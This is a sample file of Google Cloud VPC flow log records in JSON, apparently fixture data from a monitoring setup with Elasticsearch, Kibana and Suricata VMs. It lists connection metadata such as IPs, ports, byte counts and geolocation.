-{"insertId":"ptjoddfhmrhgn","jsonPayload":{"bytes_sent":"73681","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65317},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220599950Z","packets_sent":"728","reporter":"DEST","rtt_msec":"62","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.740491697Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhga","jsonPayload":{"bytes_sent":"92566","connection":{"dest_ip":"203.0.113.58","dest_port":65317,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220599950Z","packets_sent":"596","reporter":"SRC","rtt_msec":"62","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.740491697Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgk","jsonPayload":{"bytes_sent":"66094","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33692},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565137912Z","packets_sent":"360","reporter":"DEST","rtt_msec":"181","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.558259934Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgm","jsonPayload":{"bytes_sent":"4900","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65262},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220741828Z","packets_sent":"542","reporter":"DEST","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.251430011Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgd","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"198.51.100.107","dest_port":52328,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:42:20.952481728Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:20.842840991Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgl","jsonPayload":{"bytes_sent":"63280","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33552},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.213081491Z","packets_sent":"361","reporter":"DEST","rtt_msec":"21","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075957044Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgi","jsonPayload":{"bytes_sent":"774029","connection":{"dest_ip":"198.51.100.239","dest_port":37292,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":24940,"city":"Bucharest","continent":"Europe","country":"rou","region":"Bucharest"},"end_time":"2019-06-14T03:49:35.841633589Z","packets_sent":"403","reporter":"SRC","rtt_msec":"102","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:35.048156283Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgo","jsonPayload":{"bytes_sent":"359272","connection":{"dest_ip":"10.87.40.76","dest_port":33876,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933338264Z","packets_sent":"66","reporter":"DEST","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466706102Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgp","jsonPayload":{"bytes_sent":"310476","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"198.51.100.239","src_port":37292},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:35.841633589Z","packets_sent":"214","reporter":"DEST","rtt_msec":"102","src_location":{"asn":24940,"city":"Bucharest","continent":"Europe","country":"rou","region":"Bucharest"},"start_time":"2019-06-14T03:40:35.048156283Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhg8","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"198.51.100.107","dest_port":59790,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:40:50.702194466Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:50.590894439Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgf","jsonPayload":{"bytes_sent":"209716","connection":{"dest_ip":"203.0.113.134","dest_port":33552,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.213081491Z","packets_sent":"262","reporter":"SRC","rtt_msec":"21","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075957044Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgg","jsonPayload":{"bytes_sent":"165643","connection":{"dest_ip":"203.0.113.134","dest_port":33556,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565214145Z","packets_sent":"256","reporter":"SRC","rtt_msec":"133","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:03.062674441Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgb","jsonPayload":{"bytes_sent":"65890","connection":{"dest_ip":"203.0.113.58","dest_port":65257,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220614265Z","packets_sent":"593","reporter":"SRC","rtt_msec":"220","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.403388091Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgs","jsonPayload":{"bytes_sent":"62620","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33538},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565124617Z","packets_sent":"358","reporter":"DEST","rtt_msec":"250","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074952616Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhge","jsonPayload":{"bytes_sent":"185520","connection":{"dest_ip":"203.0.113.134","dest_port":33692,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565137912Z","packets_sent":"249","reporter":"SRC","rtt_msec":"181","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.558259934Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgc","jsonPayload":{"bytes_sent":"33269","connection":{"dest_ip":"203.0.113.58","dest_port":65262,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220741828Z","packets_sent":"517","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.251430011Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhg7","jsonPayload":{"bytes_sent":"58811","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33556},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565214145Z","packets_sent":"358","reporter":"DEST","rtt_msec":"133","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:03.062674441Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgq","jsonPayload":{"bytes_sent":"5220","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33876},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933338264Z","packets_sent":"86","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466706102Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"bxuq05fhgmw9d","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"198.51.100.182","src_port":41818},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:13.478093057Z","packets_sent":"4","reporter":"DEST","rtt_msec":"1350","src_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"start_time":"2019-06-14T03:40:11.031370298Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw90","jsonPayload":{"bytes_sent":"4580","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33524},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.461240929Z","packets_sent":"60","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:24.789945697Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw8w","jsonPayload":{"bytes_sent":"270437","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65322},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.408936364Z","packets_sent":"668","reporter":"DEST","rtt_msec":"92","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.703392247Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw94","jsonPayload":{"bytes_sent":"19019","connection":{"dest_ip":"203.0.113.58","dest_port":65322,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:55.408936364Z","packets_sent":"604","reporter":"SRC","rtt_msec":"92","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.703392247Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw8x","jsonPayload":{"bytes_sent":"16208","connection":{"dest_ip":"10.87.40.76","dest_port":33568,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789269849Z","packets_sent":"80","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.455711202Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw8v","jsonPayload":{"bytes_sent":"9800","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33568},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789269849Z","packets_sent":"120","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.455711202Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw8z","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.0.2.117","src_port":58026},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:09.114674887Z","packets_sent":"7","reporter":"DEST","rtt_msec":"40","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:49:08.995009558Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw9b","jsonPayload":{"bytes_sent":"19506","connection":{"dest_ip":"10.87.40.76","dest_port":33564,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597223164Z","packets_sent":"180","reporter":"DEST","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.866699945Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw8y","jsonPayload":{"bytes_sent":"1496","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":32882},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:44:07.811355936Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:44:07.689331553Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw9e","jsonPayload":{"bytes_sent":"155675","connection":{"dest_ip":"192.0.2.177","dest_port":60126,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:52.101129310Z","packets_sent":"288","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.019841536Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw98","jsonPayload":{"bytes_sent":"1791","connection":{"dest_ip":"203.0.113.27","dest_port":32882,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:44:07.811355936Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:44:07.689331553Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 